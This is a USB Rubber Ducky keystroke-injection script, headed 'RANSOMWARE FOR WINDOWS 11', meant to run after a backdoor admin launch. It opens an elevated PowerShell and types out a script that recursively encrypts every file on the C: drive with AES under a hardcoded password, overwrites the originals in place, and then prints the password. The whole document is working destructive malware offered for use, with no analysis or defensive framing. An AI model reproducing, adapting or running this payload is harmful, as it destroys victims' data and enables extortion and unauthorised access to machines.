REM ################################################# REM # # REM # RANSOMWARE FOR WINDOWS 11 # REM # USED AFTER LAUNCHING BACKDOOR ADMIN # REM # PASSWORD: asd@123456 # REM # # REM ################################################# DELAY 1000 GUI R DELAY 200 STRING powershell DELAY 400 CTRL ALT ENTER DELAY 500 LEFTARROW DELAY 600 ENTER DELAY 200 STRING # Encrypt-CDrive.ps1 DELAY 150 SHIFT ENTER DELAY 150 STRING param ( DELAY 150 SHIFT ENTER DELAY 150 STRING [string]$DrivePath = "C:\", # Path to the C: drive DELAY 200 SHIFT ENTER DELAY 150 STRING [string]$Password = "asd@123456" DELAY 170 SHIFT ENTER DELAY 120 STRING ) DELAY 100 SHIFT ENTER DELAY 200 STRING # Convert the password to a byte array DELAY 200 SHIFT ENTER DELAY 150 STRING $Key = New-Object byte[] 32 DELAY 150 SHIFT ENTER DELAY 150 STRING $Rfc2898DeriveBytes = New-Object Security.Cryptography.Rfc2898DeriveBytes($Password, [byte[]](1..16), 1000) DELAY 300 SHIFT ENTER DELAY 150 STRING $Key = $Rfc2898DeriveBytes.GetBytes(32) DELAY 150 SHIFT ENTER DELAY 150 STRING # Encrypt each file in the C: drive and subfolders DELAY 150 SHIFT ENTER DELAY 150 STRING Get-ChildItem -Path $DrivePath -Recurse -File | ForEach-Object { DELAY 200 SHIFT ENTER DELAY 150 STRING $FilePath = $_.FullName DELAY 120 SHIFT ENTER DELAY 150 STRING # Generate an IV (Initialization Vector) DELAY 150 SHIFT ENTER DELAY 150 STRING $IV = New-Object byte[] 16 DELAY 150 SHIFT ENTER DELAY 150 STRING [System.Security.Cryptography.RNGCryptoServiceProvider]::Create().GetBytes($IV) DELAY 220 SHIFT ENTER DELAY 150 STRING # Read the content of the file DELAY 150 SHIFT ENTER DELAY 150 STRING $PlainText = [System.IO.File]::ReadAllBytes($FilePath) DELAY 170 SHIFT ENTER DELAY 150 STRING # Encrypt the content DELAY 130 SHIFT ENTER DELAY 150 STRING $Aes = [System.Security.Cryptography.AesManaged]::Create() DELAY 200 SHIFT ENTER DELAY 150 STRING $Aes.Key = $Key DELAY 130 SHIFT ENTER DELAY 150 STRING $Aes.IV = $IV DELAY 130 SHIFT ENTER DELAY 150 STRING $Encryptor = $Aes.CreateEncryptor() DELAY 160 SHIFT ENTER DELAY 150 STRING $EncryptedBytes = $Encryptor.TransformFinalBlock($PlainText, 0, $PlainText.Length) DELAY 300 SHIFT ENTER DELAY 150 STRING # Save the IV and encrypted content back to the original file DELAY 170 SHIFT ENTER DELAY 150 STRING [System.IO.File]::WriteAllBytes($FilePath, $IV + $EncryptedBytes) DELAY 200 SHIFT ENTER DELAY 150 STRING Write-Host "File encrypted successfully: $FilePath" DELAY 170 SHIFT ENTER DELAY 150 STRING } DELAY 100 SHIFT ENTER DELAY 150 STRING Write-Host "All files on the C: drive have been encrypted successfully!" DELAY 250 SHIFT ENTER DELAY 150 STRING Write-Host "Use this password for decryption: $Password" DELAY 170 ENTER